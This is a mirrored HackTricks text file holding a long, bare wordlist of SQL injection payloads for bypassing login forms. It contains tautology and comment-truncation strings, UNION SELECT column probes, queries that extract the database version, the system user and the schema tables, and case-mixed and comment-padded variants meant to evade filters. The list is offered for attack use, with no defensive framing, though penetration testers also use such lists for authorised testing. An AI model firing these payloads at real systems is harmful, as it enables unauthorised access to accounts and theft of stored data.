mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 22:03:10 +00:00
771 lines
No EOL
11 KiB
Text
771 lines
No EOL
11 KiB
Text
'-'
|
||
' '
|
||
'&'
|
||
'^'
|
||
'*'
|
||
' or ''-'
|
||
' or '' '
|
||
' or ''&'
|
||
' or ''^'
|
||
' or ''*'
|
||
"-"
|
||
" "
|
||
"&"
|
||
"^"
|
||
"*"
|
||
" or ""-"
|
||
" or "" "
|
||
" or ""&"
|
||
" or ""^"
|
||
" or ""*"
|
||
or true--
|
||
" or true--
|
||
' or true--
|
||
") or true--
|
||
') or true--
|
||
' or 'x'='x
|
||
') or ('x')=('x
|
||
')) or (('x'))=(('x
|
||
" or "x"="x
|
||
") or ("x")=("x
|
||
")) or (("x"))=(("x
|
||
or 1=1
|
||
or 1=1--
|
||
or 1=1#
|
||
or 1=1/*
|
||
admin' --
|
||
admin' #
|
||
admin'/*
|
||
admin' or '1'='1
|
||
admin' or '1'='1'--
|
||
admin' or '1'='1'#
|
||
admin' or '1'='1'/*
|
||
admin'or 1=1 or ''='
|
||
admin' or 1=1
|
||
admin' or 1=1--
|
||
admin' or 1=1#
|
||
admin' or 1=1/*
|
||
admin') or ('1'='1
|
||
admin') or ('1'='1'--
|
||
admin') or ('1'='1'#
|
||
admin') or ('1'='1'/*
|
||
admin') or '1'='1
|
||
admin') or '1'='1'--
|
||
admin') or '1'='1'#
|
||
admin') or '1'='1'/*
|
||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||
admin" --
|
||
admin" #
|
||
admin"/*
|
||
admin" or "1"="1
|
||
admin" or "1"="1"--
|
||
admin" or "1"="1"#
|
||
admin" or "1"="1"/*
|
||
admin"or 1=1 or ""="
|
||
admin" or 1=1
|
||
admin" or 1=1--
|
||
admin" or 1=1#
|
||
admin" or 1=1/*
|
||
admin") or ("1"="1
|
||
admin") or ("1"="1"--
|
||
admin") or ("1"="1"#
|
||
admin") or ("1"="1"/*
|
||
admin") or "1"="1
|
||
admin") or "1"="1"--
|
||
admin") or "1"="1"#
|
||
admin") or "1"="1"/*
|
||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||
==
|
||
=
|
||
'
|
||
' --
|
||
' #
|
||
' –
|
||
'--
|
||
'/*
|
||
'#
|
||
" --
|
||
" #
|
||
"/*
|
||
' and 1='1
|
||
' and a='a
|
||
or 1=1
|
||
or true
|
||
' or ''='
|
||
" or ""="
|
||
1′) and '1′='1–
|
||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||
and 1=1
|
||
and 1=1–
|
||
' and 'one'='one
|
||
' and 'one'='one–
|
||
' group by password having 1=1--
|
||
' group by userid having 1=1--
|
||
' group by username having 1=1--
|
||
like '%'
|
||
or 0=0 --
|
||
or 0=0 #
|
||
or 0=0 –
|
||
' or 0=0 #
|
||
' or 0=0 --
|
||
' or 0=0 #
|
||
' or 0=0 –
|
||
" or 0=0 --
|
||
" or 0=0 #
|
||
" or 0=0 –
|
||
%' or '0'='0
|
||
or 1=1
|
||
or 1=1--
|
||
or 1=1/*
|
||
or 1=1#
|
||
or 1=1–
|
||
' or 1=1--
|
||
' or '1'='1
|
||
' or '1'='1'--
|
||
' or '1'='1'/*
|
||
' or '1'='1'#
|
||
' or '1′='1
|
||
' or 1=1
|
||
' or 1=1 --
|
||
' or 1=1 –
|
||
' or 1=1--
|
||
' or 1=1;#
|
||
' or 1=1/*
|
||
' or 1=1#
|
||
' or 1=1–
|
||
') or '1'='1
|
||
') or '1'='1--
|
||
') or '1'='1'--
|
||
') or '1'='1'/*
|
||
') or '1'='1'#
|
||
') or ('1'='1
|
||
') or ('1'='1--
|
||
') or ('1'='1'--
|
||
') or ('1'='1'/*
|
||
') or ('1'='1'#
|
||
'or'1=1
|
||
'or'1=1′
|
||
" or "1"="1
|
||
" or "1"="1"--
|
||
" or "1"="1"/*
|
||
" or "1"="1"#
|
||
" or 1=1
|
||
" or 1=1 --
|
||
" or 1=1 –
|
||
" or 1=1--
|
||
" or 1=1/*
|
||
" or 1=1#
|
||
" or 1=1–
|
||
") or "1"="1
|
||
") or "1"="1"--
|
||
") or "1"="1"/*
|
||
") or "1"="1"#
|
||
") or ("1"="1
|
||
") or ("1"="1"--
|
||
") or ("1"="1"/*
|
||
") or ("1"="1"#
|
||
) or '1′='1–
|
||
) or ('1′='1–
|
||
' or 1=1 LIMIT 1;#
|
||
'or 1=1 or ''='
|
||
"or 1=1 or ""="
|
||
' or 'a'='a
|
||
' or a=a--
|
||
' or a=a–
|
||
') or ('a'='a
|
||
" or "a"="a
|
||
") or ("a"="a
|
||
') or ('a'='a and hi") or ("a"="a
|
||
' or 'one'='one
|
||
' or 'one'='one–
|
||
' or uid like '%
|
||
' or uname like '%
|
||
' or userid like '%
|
||
' or user like '%
|
||
' or username like '%
|
||
' or 'x'='x
|
||
') or ('x'='x
|
||
" or "x"="x
|
||
' OR 'x'='x'#;
|
||
'=' 'or' and '=' 'or'
|
||
' UNION ALL SELECT 1, @@version;#
|
||
' UNION ALL SELECT system_user(),user();#
|
||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||
admin' and substring(password/text(),1,1)='7
|
||
' and substring(password/text(),1,1)='7
|
||
|
||
==
|
||
=
|
||
'
|
||
"
|
||
'-- 2
|
||
'/*
|
||
'#
|
||
"-- 2
|
||
" #
|
||
"/*
|
||
'-'
|
||
'&'
|
||
'^'
|
||
'*'
|
||
'='
|
||
0'<'2
|
||
"-"
|
||
"&"
|
||
"^"
|
||
"*"
|
||
"="
|
||
0"<"2
|
||
|
||
')
|
||
")
|
||
')-- 2
|
||
')/*
|
||
')#
|
||
")-- 2
|
||
") #
|
||
")/*
|
||
')-('
|
||
')&('
|
||
')^('
|
||
')*('
|
||
')=('
|
||
0')<('2
|
||
")-("
|
||
")&("
|
||
")^("
|
||
")*("
|
||
")=("
|
||
0")<("2
|
||
|
||
'-''-- 2
|
||
'-''#
|
||
'-''/*
|
||
'&''-- 2
|
||
'&''#
|
||
'&''/*
|
||
'^''-- 2
|
||
'^''#
|
||
'^''/*
|
||
'*''-- 2
|
||
'*''#
|
||
'*''/*
|
||
'=''-- 2
|
||
'=''#
|
||
'=''/*
|
||
0'<'2'-- 2
|
||
0'<'2'#
|
||
0'<'2'/*
|
||
"-""-- 2
|
||
"-""#
|
||
"-""/*
|
||
"&""-- 2
|
||
"&""#
|
||
"&""/*
|
||
"^""-- 2
|
||
"^""#
|
||
"^""/*
|
||
"*""-- 2
|
||
"*""#
|
||
"*""/*
|
||
"=""-- 2
|
||
"=""#
|
||
"=""/*
|
||
0"<"2"-- 2
|
||
0"<"2"#
|
||
0"<"2"/*
|
||
|
||
')-''-- 2
|
||
')-''#
|
||
')-''/*
|
||
')&''-- 2
|
||
')&''#
|
||
')&''/*
|
||
')^''-- 2
|
||
')^''#
|
||
')^''/*
|
||
')*''-- 2
|
||
')*''#
|
||
')*''/*
|
||
')=''-- 2
|
||
')=''#
|
||
')=''/*
|
||
0')<'2'-- 2
|
||
0')<'2'#
|
||
0')<'2'/*
|
||
")-""-- 2
|
||
")-""#
|
||
")-""/*
|
||
")&""-- 2
|
||
")&""#
|
||
")&""/*
|
||
")^""-- 2
|
||
")^""#
|
||
")^""/*
|
||
")*""-- 2
|
||
")*""#
|
||
")*""/*
|
||
")=""-- 2
|
||
")=""#
|
||
")=""/*
|
||
0")<"2-- 2
|
||
0")<"2#
|
||
0")<"2/*
|
||
|
||
|
||
'oR'2
|
||
'oR'2'-- 2
|
||
'oR'2'#
|
||
'oR'2'/*
|
||
'oR'2'oR'
|
||
'oR(2)-- 2
|
||
'oR(2)#
|
||
'oR(2)/*
|
||
'oR(2)oR'
|
||
'oR 2-- 2
|
||
'oR 2#
|
||
'oR 2/*
|
||
'oR 2 oR'
|
||
'oR/**/2-- 2
|
||
'oR/**/2#
|
||
'oR/**/2/*
|
||
'oR/**/2/**/oR'
|
||
"oR"2
|
||
"oR"2"-- 2
|
||
"oR"2"#
|
||
"oR"2"/*
|
||
"oR"2"oR"
|
||
"oR(2)-- 2
|
||
"oR(2)#
|
||
"oR(2)/*
|
||
"oR(2)oR"
|
||
"oR 2-- 2
|
||
"oR 2#
|
||
"oR 2/*
|
||
"oR 2 oR"
|
||
"oR/**/2-- 2
|
||
"oR/**/2#
|
||
"oR/**/2/*
|
||
"oR/**/2/**/oR"
|
||
|
||
'oR'2'='2
|
||
'oR'2'='2'oR'
|
||
'oR'2'='2'-- 2
|
||
'oR'2'='2'#
|
||
'oR'2'='2'/*
|
||
'oR'2'='2'oR'
|
||
'oR 2=2-- 2
|
||
'oR 2=2#
|
||
'oR 2=2/*
|
||
'oR 2=2 oR'
|
||
'oR/**/2=2-- 2
|
||
'oR/**/2=2#
|
||
'oR/**/2=2/*
|
||
'oR/**/2=2/**/oR'
|
||
'oR(2)=2-- 2
|
||
'oR(2)=2#
|
||
'oR(2)=2/*
|
||
'oR(2)=2/*
|
||
'oR(2)=(2)oR'
|
||
'oR'2'='2' LimIT 1-- 2
|
||
'oR'2'='2' LimIT 1#
|
||
'oR'2'='2' LimIT 1/*
|
||
'oR(2)=(2)LimIT(1)-- 2
|
||
'oR(2)=(2)LimIT(1)#
|
||
'oR(2)=(2)LimIT(1)/*
|
||
"oR"2"="2
|
||
"oR"2"="2"oR"
|
||
"oR"2"="2"-- 2
|
||
"oR"2"="2"#
|
||
"oR"2"="2"/*
|
||
"oR"2"="2"oR"
|
||
"oR 2=2-- 2
|
||
"oR 2=2#
|
||
"oR 2=2/*
|
||
"oR 2=2 oR"
|
||
"oR/**/2=2-- 2
|
||
"oR/**/2=2#
|
||
"oR/**/2=2/*
|
||
"oR/**/2=2/**/oR"
|
||
"oR(2)=2-- 2
|
||
"oR(2)=2#
|
||
"oR(2)=2/*
|
||
"oR(2)=2/*
|
||
"oR(2)=(2)oR"
|
||
"oR"2"="2" LimIT 1-- 2
|
||
"oR"2"="2" LimIT 1#
|
||
"oR"2"="2" LimIT 1/*
|
||
"oR(2)=(2)LimIT(1)-- 2
|
||
"oR(2)=(2)LimIT(1)#
|
||
"oR(2)=(2)LimIT(1)/*
|
||
|
||
'oR true-- 2
|
||
'oR true#
|
||
'oR true/*
|
||
'oR true oR'
|
||
'oR(true)-- 2
|
||
'oR(true)#
|
||
'oR(true)/*
|
||
'oR(true)oR'
|
||
'oR/**/true-- 2
|
||
'oR/**/true#
|
||
'oR/**/true/*
|
||
'oR/**/true/**/oR'
|
||
"oR true-- 2
|
||
"oR true#
|
||
"oR true/*
|
||
"oR true oR"
|
||
"oR(true)-- 2
|
||
"oR(true)#
|
||
"oR(true)/*
|
||
"oR(true)oR"
|
||
"oR/**/true-- 2
|
||
"oR/**/true#
|
||
"oR/**/true/*
|
||
"oR/**/true/**/oR"
|
||
|
||
'oR'2'LiKE'2
|
||
'oR'2'LiKE'2'-- 2
|
||
'oR'2'LiKE'2'#
|
||
'oR'2'LiKE'2'/*
|
||
'oR'2'LiKE'2'oR'
|
||
'oR(2)LiKE(2)-- 2
|
||
'oR(2)LiKE(2)#
|
||
'oR(2)LiKE(2)/*
|
||
'oR(2)LiKE(2)oR'
|
||
"oR"2"LiKE"2
|
||
"oR"2"LiKE"2"-- 2
|
||
"oR"2"LiKE"2"#
|
||
"oR"2"LiKE"2"/*
|
||
"oR"2"LiKE"2"oR"
|
||
"oR(2)LiKE(2)-- 2
|
||
"oR(2)LiKE(2)#
|
||
"oR(2)LiKE(2)/*
|
||
"oR(2)LiKE(2)oR"
|
||
|
||
admin
|
||
admin'-- 2
|
||
admin'#
|
||
admin'/*
|
||
admin"-- 2
|
||
admin"#
|
||
ffifdyop
|
||
|
||
' UniON SElecT 1,2-- 2
|
||
' UniON SElecT 1,2,3-- 2
|
||
' UniON SElecT 1,2,3,4-- 2
|
||
' UniON SElecT 1,2,3,4,5-- 2
|
||
' UniON SElecT 1,2#
|
||
' UniON SElecT 1,2,3#
|
||
' UniON SElecT 1,2,3,4#
|
||
' UniON SElecT 1,2,3,4,5#
|
||
'UniON(SElecT(1),2)-- 2
|
||
'UniON(SElecT(1),2,3)-- 2
|
||
'UniON(SElecT(1),2,3,4)-- 2
|
||
'UniON(SElecT(1),2,3,4,5)-- 2
|
||
'UniON(SElecT(1),2)#
|
||
'UniON(SElecT(1),2,3)#
|
||
'UniON(SElecT(1),2,3,4)#
|
||
'UniON(SElecT(1),2,3,4,5)#
|
||
" UniON SElecT 1,2-- 2
|
||
" UniON SElecT 1,2,3-- 2
|
||
" UniON SElecT 1,2,3,4-- 2
|
||
" UniON SElecT 1,2,3,4,5-- 2
|
||
" UniON SElecT 1,2#
|
||
" UniON SElecT 1,2,3#
|
||
" UniON SElecT 1,2,3,4#
|
||
" UniON SElecT 1,2,3,4,5#
|
||
"UniON(SElecT(1),2)-- 2
|
||
"UniON(SElecT(1),2,3)-- 2
|
||
"UniON(SElecT(1),2,3,4)-- 2
|
||
"UniON(SElecT(1),2,3,4,5)-- 2
|
||
"UniON(SElecT(1),2)#
|
||
"UniON(SElecT(1),2,3)#
|
||
"UniON(SElecT(1),2,3,4)#
|
||
"UniON(SElecT(1),2,3,4,5)#
|
||
|
||
'||'2
|
||
'||2-- 2
|
||
'||'2'||'
|
||
'||2#
|
||
'||2/*
|
||
'||2||'
|
||
"||"2
|
||
"||2-- 2
|
||
"||"2"||"
|
||
"||2#
|
||
"||2/*
|
||
"||2||"
|
||
'||'2'='2
|
||
'||'2'='2'||'
|
||
'||2=2-- 2
|
||
'||2=2#
|
||
'||2=2/*
|
||
'||2=2||'
|
||
"||"2"="2
|
||
"||"2"="2"||"
|
||
"||2=2-- 2
|
||
"||2=2#
|
||
"||2=2/*
|
||
"||2=2||"
|
||
'||2=(2)LimIT(1)-- 2
|
||
'||2=(2)LimIT(1)#
|
||
'||2=(2)LimIT(1)/*
|
||
"||2=(2)LimIT(1)-- 2
|
||
"||2=(2)LimIT(1)#
|
||
"||2=(2)LimIT(1)/*
|
||
'||true-- 2
|
||
'||true#
|
||
'||true/*
|
||
'||true||'
|
||
"||true-- 2
|
||
"||true#
|
||
"||true/*
|
||
"||true||"
|
||
'||'2'LiKE'2
|
||
'||'2'LiKE'2'-- 2
|
||
'||'2'LiKE'2'#
|
||
'||'2'LiKE'2'/*
|
||
'||'2'LiKE'2'||'
|
||
'||(2)LiKE(2)-- 2
|
||
'||(2)LiKE(2)#
|
||
'||(2)LiKE(2)/*
|
||
'||(2)LiKE(2)||'
|
||
"||"2"LiKE"2
|
||
"||"2"LiKE"2"-- 2
|
||
"||"2"LiKE"2"#
|
||
"||"2"LiKE"2"/*
|
||
"||"2"LiKE"2"||"
|
||
"||(2)LiKE(2)-- 2
|
||
"||(2)LiKE(2)#
|
||
"||(2)LiKE(2)/*
|
||
"||(2)LiKE(2)||"
|
||
|
||
')oR('2
|
||
')oR'2'-- 2
|
||
')oR'2'#
|
||
')oR'2'/*
|
||
')oR'2'oR('
|
||
')oR(2)-- 2
|
||
')oR(2)#
|
||
')oR(2)/*
|
||
')oR(2)oR('
|
||
')oR 2-- 2
|
||
')oR 2#
|
||
')oR 2/*
|
||
')oR 2 oR('
|
||
')oR/**/2-- 2
|
||
')oR/**/2#
|
||
')oR/**/2/*
|
||
')oR/**/2/**/oR('
|
||
")oR("2
|
||
")oR"2"-- 2
|
||
")oR"2"#
|
||
")oR"2"/*
|
||
")oR"2"oR("
|
||
")oR(2)-- 2
|
||
")oR(2)#
|
||
")oR(2)/*
|
||
")oR(2)oR("
|
||
")oR 2-- 2
|
||
")oR 2#
|
||
")oR 2/*
|
||
")oR 2 oR("
|
||
")oR/**/2-- 2
|
||
")oR/**/2#
|
||
")oR/**/2/*
|
||
")oR/**/2/**/oR("
|
||
')oR'2'=('2
|
||
')oR'2'='2'oR('
|
||
')oR'2'='2'-- 2
|
||
')oR'2'='2'#
|
||
')oR'2'='2'/*
|
||
')oR'2'='2'oR('
|
||
')oR 2=2-- 2
|
||
')oR 2=2#
|
||
')oR 2=2/*
|
||
')oR 2=2 oR('
|
||
')oR/**/2=2-- 2
|
||
')oR/**/2=2#
|
||
')oR/**/2=2/*
|
||
')oR/**/2=2/**/oR('
|
||
')oR(2)=2-- 2
|
||
')oR(2)=2#
|
||
')oR(2)=2/*
|
||
')oR(2)=2/*
|
||
')oR(2)=(2)oR('
|
||
')oR'2'='2' LimIT 1-- 2
|
||
')oR'2'='2' LimIT 1#
|
||
')oR'2'='2' LimIT 1/*
|
||
')oR(2)=(2)LimIT(1)-- 2
|
||
')oR(2)=(2)LimIT(1)#
|
||
')oR(2)=(2)LimIT(1)/*
|
||
")oR"2"=("2
|
||
")oR"2"="2"oR("
|
||
")oR"2"="2"-- 2
|
||
")oR"2"="2"#
|
||
")oR"2"="2"/*
|
||
")oR"2"="2"oR("
|
||
")oR 2=2-- 2
|
||
")oR 2=2#
|
||
")oR 2=2/*
|
||
")oR 2=2 oR("
|
||
")oR/**/2=2-- 2
|
||
")oR/**/2=2#
|
||
")oR/**/2=2/*
|
||
")oR/**/2=2/**/oR("
|
||
")oR(2)=2-- 2
|
||
")oR(2)=2#
|
||
")oR(2)=2/*
|
||
")oR(2)=2/*
|
||
")oR(2)=(2)oR("
|
||
")oR"2"="2" LimIT 1-- 2
|
||
")oR"2"="2" LimIT 1#
|
||
")oR"2"="2" LimIT 1/*
|
||
")oR(2)=(2)LimIT(1)-- 2
|
||
")oR(2)=(2)LimIT(1)#
|
||
")oR(2)=(2)LimIT(1)/*
|
||
')oR true-- 2
|
||
')oR true#
|
||
')oR true/*
|
||
')oR true oR('
|
||
')oR(true)-- 2
|
||
')oR(true)#
|
||
')oR(true)/*
|
||
')oR(true)oR('
|
||
')oR/**/true-- 2
|
||
')oR/**/true#
|
||
')oR/**/true/*
|
||
')oR/**/true/**/oR('
|
||
")oR true-- 2
|
||
")oR true#
|
||
")oR true/*
|
||
")oR true oR("
|
||
")oR(true)-- 2
|
||
")oR(true)#
|
||
")oR(true)/*
|
||
")oR(true)oR("
|
||
")oR/**/true-- 2
|
||
")oR/**/true#
|
||
")oR/**/true/*
|
||
")oR/**/true/**/oR("
|
||
')oR'2'LiKE('2
|
||
')oR'2'LiKE'2'-- 2
|
||
')oR'2'LiKE'2'#
|
||
')oR'2'LiKE'2'/*
|
||
')oR'2'LiKE'2'oR('
|
||
')oR(2)LiKE(2)-- 2
|
||
')oR(2)LiKE(2)#
|
||
')oR(2)LiKE(2)/*
|
||
')oR(2)LiKE(2)oR('
|
||
")oR"2"LiKE("2
|
||
")oR"2"LiKE"2"-- 2
|
||
")oR"2"LiKE"2"#
|
||
")oR"2"LiKE"2"/*
|
||
")oR"2"LiKE"2"oR("
|
||
")oR(2)LiKE(2)-- 2
|
||
")oR(2)LiKE(2)#
|
||
")oR(2)LiKE(2)/*
|
||
")oR(2)LiKE(2)oR("
|
||
admin')-- 2
|
||
admin')#
|
||
admin')/*
|
||
admin")-- 2
|
||
admin")#
|
||
') UniON SElecT 1,2-- 2
|
||
') UniON SElecT 1,2,3-- 2
|
||
') UniON SElecT 1,2,3,4-- 2
|
||
') UniON SElecT 1,2,3,4,5-- 2
|
||
') UniON SElecT 1,2#
|
||
') UniON SElecT 1,2,3#
|
||
') UniON SElecT 1,2,3,4#
|
||
') UniON SElecT 1,2,3,4,5#
|
||
')UniON(SElecT(1),2)-- 2
|
||
')UniON(SElecT(1),2,3)-- 2
|
||
')UniON(SElecT(1),2,3,4)-- 2
|
||
')UniON(SElecT(1),2,3,4,5)-- 2
|
||
')UniON(SElecT(1),2)#
|
||
')UniON(SElecT(1),2,3)#
|
||
')UniON(SElecT(1),2,3,4)#
|
||
')UniON(SElecT(1),2,3,4,5)#
|
||
") UniON SElecT 1,2-- 2
|
||
") UniON SElecT 1,2,3-- 2
|
||
") UniON SElecT 1,2,3,4-- 2
|
||
") UniON SElecT 1,2,3,4,5-- 2
|
||
") UniON SElecT 1,2#
|
||
") UniON SElecT 1,2,3#
|
||
") UniON SElecT 1,2,3,4#
|
||
") UniON SElecT 1,2,3,4,5#
|
||
")UniON(SElecT(1),2)-- 2
|
||
")UniON(SElecT(1),2,3)-- 2
|
||
")UniON(SElecT(1),2,3,4)-- 2
|
||
")UniON(SElecT(1),2,3,4,5)-- 2
|
||
")UniON(SElecT(1),2)#
|
||
")UniON(SElecT(1),2,3)#
|
||
")UniON(SElecT(1),2,3,4)#
|
||
")UniON(SElecT(1),2,3,4,5)#
|
||
')||('2
|
||
')||2-- 2
|
||
')||'2'||('
|
||
')||2#
|
||
')||2/*
|
||
')||2||('
|
||
")||("2
|
||
")||2-- 2
|
||
")||"2"||("
|
||
")||2#
|
||
")||2/*
|
||
")||2||("
|
||
')||'2'=('2
|
||
')||'2'='2'||('
|
||
')||2=2-- 2
|
||
')||2=2#
|
||
')||2=2/*
|
||
')||2=2||('
|
||
")||"2"=("2
|
||
")||"2"="2"||("
|
||
")||2=2-- 2
|
||
")||2=2#
|
||
")||2=2/*
|
||
")||2=2||("
|
||
')||2=(2)LimIT(1)-- 2
|
||
')||2=(2)LimIT(1)#
|
||
')||2=(2)LimIT(1)/*
|
||
")||2=(2)LimIT(1)-- 2
|
||
")||2=(2)LimIT(1)#
|
||
")||2=(2)LimIT(1)/*
|
||
')||true-- 2
|
||
')||true#
|
||
')||true/*
|
||
')||true||('
|
||
")||true-- 2
|
||
")||true#
|
||
")||true/*
|
||
")||true||("
|
||
')||'2'LiKE('2
|
||
')||'2'LiKE'2'-- 2
|
||
')||'2'LiKE'2'#
|
||
')||'2'LiKE'2'/*
|
||
')||'2'LiKE'2'||('
|
||
')||(2)LiKE(2)-- 2
|
||
')||(2)LiKE(2)#
|
||
')||(2)LiKE(2)/*
|
||
')||(2)LiKE(2)||('
|
||
")||"2"LiKE("2
|
||
")||"2"LiKE"2"-- 2
|
||
")||"2"LiKE"2"#
|
||
")||"2"LiKE"2"/*
|
||
")||"2"LiKE"2"||("
|
||
")||(2)LiKE(2)-- 2
|
||
")||(2)LiKE(2)#
|
||
")||(2)LiKE(2)/*
|
||
")||(2)LiKE(2)||("
|
||
' UnION SELeCT 1,2`
|
||
' UnION SELeCT 1,2,3`
|
||
' UnION SELeCT 1,2,3,4`
|
||
' UnION SELeCT 1,2,3,4,5`
|
||
" UnION SELeCT 1,2`
|
||
" UnION SELeCT 1,2,3`
|
||
" UnION SELeCT 1,2,3,4`
|
||
" UnION SELeCT 1,2,3,4,5` |